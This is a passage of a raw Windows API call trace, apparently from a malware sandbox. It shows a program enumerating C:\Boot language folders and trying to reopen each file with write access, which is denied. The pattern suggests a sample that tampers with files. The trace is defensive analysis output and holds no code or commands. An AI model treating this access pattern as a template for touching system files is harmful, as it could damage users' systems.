(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.045] AreFileApisANSI () returned 1 [0070.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\it-IT\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\it-IT\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.045] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.045] AreFileApisANSI () returned 1 [0070.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.045] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0070.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\it-IT\\memtest.exe.mui") returned 30 [0070.045] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.130] GetFileType (hFile=0x41c) returned 0x1 [0070.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.241] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.242] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.242] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.242] CloseHandle (hObject=0x41c) returned 1 [0070.243] AreFileApisANSI () returned 1 [0070.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\it-IT\\memtest.exe.mui") returned 30 [0070.243] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.243] GetLastError () returned 0x5 [0070.243] GetLastError () returned 0x5 [0070.243] SetLastError (dwErrCode=0x5) [0070.243] GetLastError () returned 0x5 [0070.244] SetLastError (dwErrCode=0x5) [0070.244] GetLastError () returned 0x5 [0070.244] SetLastError (dwErrCode=0x5) [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.244] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓놠")) returned 0 [0070.244] FindClose (in: hFindFile=0x781d0 | out: hFindFile=0x781d0) returned 1 [0070.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0070.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.245] AreFileApisANSI () returned 1 [0070.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ja-JP", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ja-JP", lpUsedDefaultChar=0x0) returned 14 [0070.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.245] AreFileApisANSI () returned 1 [0070.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0070.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ja-JP") returned 14 [0070.245] CreateFileW (lpFileName="C:\\Boot\\ja-JP" (normalized: "c:\\boot\\ja-jp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.246] GetLastError () returned 0x5 [0070.246] GetLastError () returned 0x5 [0070.246] SetLastError (dwErrCode=0x5) [0070.246] GetLastError () returned 0x5 [0070.246] SetLastError (dwErrCode=0x5) [0070.246] GetLastError () returned 0x5 [0070.246] SetLastError (dwErrCode=0x5) [0070.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.246] AreFileApisANSI () returned 1 [0070.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x886a8 [0070.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x886a8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ja-JP") returned 14 [0070.246] CreateFileW (lpFileName="C:\\Boot\\ja-JP" (normalized: "c:\\boot\\ja-jp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.246] GetLastError () returned 0x5 [0070.246] GetLastError () returned 0x5 [0070.246] SetLastError (dwErrCode=0x5) [0070.246] GetLastError () returned 0x5 [0070.246] SetLastError (dwErrCode=0x5) [0070.246] GetLastError () returned 0x5 [0070.246] SetLastError (dwErrCode=0x5) [0070.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.247] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.247] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0070.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0070.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.247] FindFirstFileExW (in: lpFileName="C:\\Boot\\ja-JP\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78450 [0070.247] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.247] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.248] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.248] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0070.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.248] AreFileApisANSI () returned 1 [0070.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ja-JP\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ja-JP\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.249] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.249] AreFileApisANSI () returned 1 [0070.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88810, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.249] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88810, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 30 [0070.249] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.249] GetFileType (hFile=0x41c) returned 0x1 [0070.250] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.250] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.250] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.250] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.250] CloseHandle (hObject=0x41c) returned 1 [0070.250] AreFileApisANSI () returned 1 [0070.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88810, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.250] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88810, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 30 [0070.250] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.251] GetLastError () returned 0x5 [0070.251] GetLastError () returned 0x5 [0070.251] SetLastError (dwErrCode=0x5) [0070.251] GetLastError () returned 0x5 [0070.251] SetLastError (dwErrCode=0x5) [0070.251] GetLastError () returned 0x5 [0070.251] SetLastError (dwErrCode=0x5) [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.251] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.251] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 